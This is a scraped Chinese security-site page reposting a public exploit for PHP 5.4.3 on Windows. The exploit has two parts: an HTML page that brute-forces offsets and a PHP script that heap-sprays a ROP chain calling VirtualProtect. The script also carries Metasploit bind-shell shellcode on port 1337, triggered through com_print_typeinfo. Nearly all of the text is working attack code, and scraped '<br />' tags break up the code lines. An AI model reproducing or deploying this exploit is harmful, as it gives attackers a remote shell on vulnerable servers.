PHP 5.4 (5.4.3) Code Execution (Win32) 代码

// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)
// Exploit author: 0in (Maksymilian Motyl)
// Email: 0in(dot)email(at)gmail.com
// * Bug with Variant type parsing originally discovered by Condis
// Tested on Windows XP SP3 fully patched (Polish)
===================
offset-brute.html
===================



PHP 5.4.3 0day by 0in & cOndis

</textarea> <br /></center> <br /><script> <br />function sleep(milliseconds) { <br />var start = new Date().getTime(); <br />for (var i = 0; i < 1e7; i++) { <br />if ((new Date().getTime() - start) > milliseconds){ <br />break; <br />} <br />} <br />} <br />function makeRequest(url, parameters) <br />{ <br />var xmlhttp = new XMLHttpRequest(); <br />if (window.XMLHttpRequest) { <br />xmlhttp = new XMLHttpRequest(); <br />if (xmlhttp.overrideMimeType) { <br />xmlhttp.overrideMimeType('text/xml'); <br />} <br />} else if (window.ActiveXObject) { <br />// IE <br />try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); } <br />catch (e) { <br />try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); } <br />catch (e) {} <br />} <br />} <br />if (!xmlhttp) { <br />alert('Giving up Cannot create an XMLHTTP instance'); <br />return false; <br />} <br />xmlhttp.open("GET",url,true); <br />xmlhttp.send(null); <br />return true; <br />} <br />test=document.getElementById("log"); <br />for(offset=0;offset<300;offset++) <br />{ <br />log.value+="Trying offset:"+offset+"\r\n"; <br />makeRequest("0day.php?offset="+offset); <br />sleep(500); <br />} <br /></script></body></html> <br />=================== <br />0day.php <br />=================== <br /><?php <br />$spray = str_repeat("\x90",0x200); <br />$offset=$_GET['offset']; <br />// 775DF0Da # ADD ESP,10 # RETN ** [ole32.dll] <br />$spray = substr_replace($spray, "\xda\xf0\x5d\x77", (strlen($spray))*-1,(strlen($spray))*-1); <br />// :> 0x048d0030 <br />$spray = substr_replace($spray, pack("L",0x048d0030+$offset), (strlen($spray)-0x8)*-1,(strlen($spray))*-1); <br />//0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN [ole32.dll] <br />$spray = substr_replace($spray, "\x9f\xae\x52\x77", (strlen($spray)-0x10)*-1,(strlen($spray))*-1); <br />// Adress of VirtualProtect 0x7c801ad4 <br />$spray = substr_replace($spray, "\xd4\x1a\x80\x7c", (strlen($spray)-0x14)*-1,(strlen($spray))*-1); <br />// LPVOID lpAddress = 0x048d0060 www.jb51.net <br />$spray = substr_replace($spray, pack("L",0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1); <br />// SIZE_T dwSize = 0x01000000 <br />$spray = substr_replace($spray, "\x00\x00\x10\x00", (strlen($spray)-0x20)*-1,(strlen($spray))*-1); <br />// DWORD flNewProtect = PAGE_EXECUTE_READWRITE (0x00000040) | 0xffffffc0 <br />$spray = substr_replace($spray, "\x40\x00\x00\x00", (strlen($spray)-0x24)*-1,(strlen($spray))*-1); <br />// __out PDWORD lpflOldProtect = 0x04300070 | 0x105240000 <br />// 0x048d0068 <br />$spray = substr_replace($spray, pack("L",0x048d0068+$offset), (strlen($spray)-0x28)*-1,(strlen($spray))*-1); <br />//0x77dfe8b4 : # XOR EAX,EAX # ADD ESP,18 # INC EAX # POP EBP # RETN 0C ** [ADVAPI32.dll] <br />$spray = substr_replace($spray, "\xb4\xe8\xdf\x77", (strlen($spray)-0x18)*-1,4); <br />// Ret Address = 0x048d0080 <br />$spray = substr_replace($spray, pack("L",0x048d0080+$offset), (strlen($spray)-0x48)*-1,4); <br />$stacktrack = "\xbc\x0c\xb0\xc0\x00"; <br />// Universal win32 bindshell on port 1337 from metasploit <br />$shellcode = $stacktrack."\x33\xc9\x83\xe9\xb0". <br />"\x81\xc4\xd0\xfd\xff\xff". <br />"\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d". <br />"\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96". <br />"\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2". <br />"\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0". <br />"\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41". <br />"\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82". <br />"\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2". <br />"\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39". <br />"\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9". <br />"\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b". <br />"\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a". <br />"\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88". <br />"\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01". <br />"\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20". <br />"\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e". <br />"\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39". <br />"\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44". <br />"\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96". <br />"\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38". <br />"\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9". <br />"\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09". <br />"\x4e\x33\xe4\x96\xcd\xcc\x32\x69"; <br />$spray = substr_replace($spray,$shellcode, (strlen($spray)-0x50)*-1,(strlen($shellcode))); <br />$fullspray=""; <br />for($i=0;$i<0x4b00;$i++) <br />{ <br />$fullspray.=$spray; <br />} <br />$j=array(); <br />$e=array(); <br />$b=array(); <br />$a=array(); <br />$c=array(); <br />array_push($j,$fullspray); <br />array_push($e,$fullspray."W"); <br />array_push($b,$fullspray."A"); <br />array_push($a,$fullspray."S"); <br />array_push($c,$fullspray."!"); <br />$vVar = new VARIANT(0x048d0038+$offset); <br />// Shoot him <br />com_print_typeinfo($vVar); //CRASH -> 102F3986 FF50 10 CALL DWORD PTR DS:[EAX+10] <br />echo $arr; <br />echo $spray; <br />?> <span id="art_bot" class="jbTestPos"></span> </div> <div class="pagebar"> </div> <div class="pcd_ad"><script src=/d/js/acmsd/thea14.js></script></div> <div class="mbd_ad"> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-5850285417076520" data-ad-slot="9825815134" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div> <div class="rights"> <h5>版权声明</h5> <p>本文仅代表作者观点，不代表本站立场。<br> 本文系作者授权发表，未经许可，不得转载。<br>本文地址：/websafe/loudongfenxi/149486.html</p> <div class="bdsharebuttonbox"><a href="#" class="bds_more" data-cmd="more"></a><a href="#" class="bds_fbook" data-cmd="fbook" title="分享到Facebook"></a><a href="#" class="bds_twi" data-cmd="twi" title="分享到Twitter"></a><a href="#" class="bds_linkedin" data-cmd="linkedin" title="分享到linkedin"></a><a href="#" class="bds_qzone" data-cmd="qzone" title="分享到QQ空间"></a><a href="#" class="bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a><a href="#" class="bds_douban" data-cmd="douban" title="分享到豆瓣网"></a><a href="#" class="bds_weixin" data-cmd="weixin" title="分享到微信"></a><a href="#" class="bds_evernotecn" data-cmd="evernotecn" title="分享到印象笔记"></a></div> <script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"1","bdSize":"24"},"share":{},"image":{"viewList":["fbook","twi","linkedin","qzone","tsina","douban","weixin","evernotecn"],"viewText":"分享到：","viewSize":"16"}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='/static/api/js/share.js?v=89860593.js?'];</script> </div> <div class="r-pn-post"> <div class="shang"><a title="Discuz 娱乐大厅插件V1.0 注入漏洞" href="/websafe/loudongfenxi/149485.html" rel="bookmark" class="prev_p"><span>上一篇 :</span> Discuz 娱乐大厅插件V1.0 注入漏洞 </a></div> <div class="xia"><a href="/websafe/loudongfenxi/149487.html" rel="bookmark" class="next_p"><span>下一篇 :</span> DedeCms V5 orderby参数注射漏洞</a></div> <div class="clear"></div> </div> </div> <div class="related"> <h4>相关文章</h4> <ul> </ul> </div> <div class="post_comments"> <div id="comment"> <link href="/skin/ecmspl/css/pl.css" rel="stylesheet"> <div class="showpage" id="plpost"> <table width="100%" border="0" cellpadding="0" cellspacing="0" style="line-height: 25px; padding: 5px 3px 1px 8px; font-size: 18px;"> <tr><td><strong><font color="#333333">留言与评论（共有 <span id="infocommentnumarea">0</span> 条评论）</font></strong></td></tr> </table> <script> function CheckPl(obj) { if(obj.saytext.value=="") { alert("您没什么话要说吗？"); obj.saytext.focus(); return false; } return true; } </script> <form action="/e/pl/doaction.php" method="post" name="saypl" id="saypl" onsubmit="return CheckPl(document.saypl)"> <table width="100%" border="0" cellpadding="0" cellspacing="0" id="plpost"> <tr> <td> <table width="100%" border="0" cellspacing="10" cellpadding="0"> <tr> <td> <script src="/e/pl/loginjspl.php"></script> <textarea name="saytext" rows="6" id="saytext" placeholder="请遵守互联网相关规定，不要发布广告和违法内容!">    

验证码：